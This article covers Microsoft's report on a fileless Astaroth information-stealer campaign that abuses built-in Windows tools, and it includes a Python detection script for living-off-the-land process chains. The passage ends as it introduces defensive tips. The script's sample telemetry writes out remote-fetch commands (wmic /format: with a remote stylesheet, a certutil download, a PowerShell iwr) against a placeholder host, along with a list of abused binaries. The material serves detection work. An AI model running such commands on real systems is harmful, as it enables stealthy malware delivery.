The Microsoft Defender ATP Research Team released a report on a malware campaign that loaded the Astaroth trojan directly into the memory of infected computers. The campaign was notable for its distribution method and its complex attack chain: it used fileless techniques to hide its activity from security products, and it abused legitimate Windows tools to do its work quietly without writing its own executables to disk.
Discovered in 2017, Astaroth is known as an information stealer. It is capable of taking sensitive information from an affected user — account credentials, keystrokes, and other data — and sending it to the attacker.
During a standard telemetry review, Andrea Lelli, a researcher on the Microsoft Defender ATP Research Team, noticed a spike in the use of the Windows Management Instrumentation Command-line (WMIC) tool to run a script, a pattern that points to a fileless technique. Following the anomaly, Lelli uncovered the Astaroth campaign, in which the attackers were loading the malware directly into the memory of victim devices.
Rather than dropping its own binaries, the campaign runs legitimate Windows tools; each tool downloads additional code and hands it to the next tool in the chain. The whole sequence executes in memory without saving any file to disk, which is what makes it "fileless execution." That fileless nature makes the campaign hard for traditional, file-scanning antivirus to detect, although security solutions that monitor process behaviour and script execution can still defend against it.
Lelli notes that the campaign "lives off the land" completely: every executable run during the attack chain is a system tool. By abusing tools already present on the target, it tries to disguise its actions as ordinary administrative activity.
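The telemetry review described above works because living-off-the-land chains still show up in process-creation logs. As an added example (not code from the Microsoft report or from this article), the Python below runs a small detection over Sysmon-style process-creation records: it flags a system tool whose command line references a remote URL, walks its parent chain, and marks the finding as a pure living-off-the-land chain when every ancestor is also a Windows system binary. The event records are constructed for illustration, the tool list and URL heuristics are the author's assumptions, and the `/format:` check reflects the documented way WMIC can be made to execute a remote stylesheet, which the article itself does not spell out.

```python
"""Flag system tools fetching remote content, and pure living-off-the-land chains.

Added example, not the Microsoft Defender ATP team's code. Records below are
constructed Sysmon Event ID 1-style fields flattened to dicts; the binary list
and regexes are starting-point assumptions, not a complete detection rule.
"""
import re
from typing import Dict, List

# Windows binaries commonly abused to download or run code (assumed starter list).
LOLBINS = {"wmic.exe", "regsvr32.exe", "mshta.exe", "certutil.exe", "bitsadmin.exe",
           "rundll32.exe", "powershell.exe", "cscript.exe", "wscript.exe",
           "cmd.exe", "explorer.exe"}

URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
# wmic /format:<stylesheet> loads an XSL file and executes any script inside it,
# so a /format: argument on wmic is worth a look even without a visible URL.
WMIC_FORMAT_RE = re.compile(r"/format:", re.IGNORECASE)

# Constructed sample telemetry: pid/ppid, image path and full command line.
EVENTS: List[Dict] = [
    {"pid": 100, "ppid": 4,   "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 210, "ppid": 100, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmd": 'wmic os get /format:"https://example.invalid/payload.xsl"'},
    {"pid": 220, "ppid": 100, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmd": "wmic os get caption"},                     # benign admin use
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe /c update.bat"},
    {"pid": 310, "ppid": 300, "image": r"C:\Windows\System32\certutil.exe",
     "cmd": "certutil -urlcache -split -f http://example.invalid/a.dll a.dll"},
    {"pid": 400, "ppid": 100, "image": r"C:\Program Files\Google\Chrome\chrome.exe",
     "cmd": "chrome.exe https://example.invalid/"},    # browsers carry URLs legitimately
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -nop -c iwr https://example.invalid/x"},
]


def image_name(path: str) -> str:
    """Return the lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_system_tool(event: Dict) -> bool:
    """True when the image is a listed tool living under C:\\Windows."""
    return (image_name(event["image"]) in LOLBINS
            and event["image"].lower().startswith("c:\\windows\\"))


def fetches_remote(event: Dict) -> bool:
    """True when the command line points at remote content or a wmic stylesheet."""
    cmd = event["cmd"]
    if URL_RE.search(cmd):
        return True
    return image_name(event["image"]) == "wmic.exe" and bool(WMIC_FORMAT_RE.search(cmd))


def ancestry(event: Dict, by_pid: Dict[int, Dict]) -> List[Dict]:
    """Walk parent pids back to the root we have telemetry for (child first)."""
    chain, seen, cur = [event], {event["pid"]}, event
    while cur["ppid"] in by_pid and cur["ppid"] not in seen:
        cur = by_pid[cur["ppid"]]
        seen.add(cur["pid"])
        chain.append(cur)
    return chain


def find_remote_fetch_by_system_tools(events: List[Dict]) -> List[Dict]:
    """Report system tools fetching remote content; mark chains made only of system tools."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if not (is_system_tool(e) and fetches_remote(e)):
            continue
        chain = ancestry(e, by_pid)
        findings.append({
            "pid": e["pid"],
            "chain": [image_name(p["image"]) for p in chain],
            "pure_lotl": all(is_system_tool(p) for p in chain),
        })
    return findings


if __name__ == "__main__":
    for f in find_remote_fetch_by_system_tools(EVENTS):
        tag = "LOTL chain" if f["pure_lotl"] else "system tool fetch"
        print(f"{tag}: pid={f['pid']} chain={' <- '.join(f['chain'])}")
```

On the sample data this yields three findings: the wmic `/format:` launch and the certutil download are flagged as pure living-off-the-land chains rooted in explorer.exe, while the PowerShell download spawned by a browser is reported as a system tool fetching remote content but not as a pure chain, since a third-party binary sits in its ancestry. The benign `wmic os get caption` and the browser's own URL produce nothing. In production the same logic would read Sysmon or EDR process events rather than an inline list, and the URL and tool lists would be tuned to the environment's baseline.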
Dealing with fileless threats
Fileless techniques are not new: 2018 saw an uptick in fileless attacks, and cybercriminals continue to retrofit older malware with them.
But while fileless threats are less visible than traditional file-based ones, they still leave telltale signs in process, script and network telemetry that IT and security teams can detect. Here are some ways enterprises can stay ahead of fileless threats: